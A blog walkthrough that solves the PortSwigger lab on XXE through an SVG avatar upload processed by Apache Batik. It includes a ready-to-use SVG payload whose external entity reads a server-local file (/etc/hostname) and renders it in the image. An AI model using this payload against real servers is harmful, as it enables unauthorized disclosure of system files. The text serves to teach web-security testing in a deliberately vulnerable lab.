Exploiting XXE Via Image File Upload

Introduction

This is our 8th article on XML or XXE injection vulnerabilities. In this article, we will solve the PortSwigger Web Security lab “Exploiting XXE via Image File Upload.” If you haven’t checked the other parts, you can search for them on our website and read them.

Lab Description Of Exploiting XXE Via Image File Upload

Exploiting XXE via image file upload

In this lab, users can post comments in the comments section along with attaching an avatar. The avatar is processed using the Apache Batik library.

To solve this lab, we need to display the content of the “/etc/passwd” file using an image. After accessing the file, you can submit it to complete the lab.

Lab Solution

Exploiting XXE via image file upload

First, you need to access the lab. Once you have access, you can view any post.

As you can see, we have the option to comment, and we can also attach an avatar. We will exploit this lab using the avatar feature.

First, we need to create an SVG file.

Exploiting XXE via image file upload

I have already created a file named “exploit.svg” on my system, which we will use to exploit this vulnerability.

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Above is the code that you need to copy and save as “exploit.svg” on your system.

Basically, if you understand XML, you can read the code. Through this code, I am fetching the “file:///etc/hostname” from the LP server. Now it’s time to exploit this vulnerability using this code.

Exploiting XXE via image file upload

Now I am clicking on the “Post Comment” button to see what happens. I see a message on the screen that says “Thank you for your comment,” indicating that our comment has been posted. Now, let’s check the post and see how our comment appears. will click on “Back to Blog.”

Exploiting XXE via image file upload

You can see my comment at the end. So we have attached two screenshots side by side. I have right-clicked on my avatar and opened it in a new window. I found a secret name, which is “b10cde35944c.” It could be the hostname. Now we will submit our hostname that we found.

Exploiting XXE via image file upload

As you can see, we have successfully solved the PortSwigger Web Security lab “Exploiting XXE via Image File Upload.” Congratulations!

If you want to learn more about web security, you can explore our website and click on the “Web Security” section in the Cyber Security menu. There you will find everything related to web security.

Leave a Comment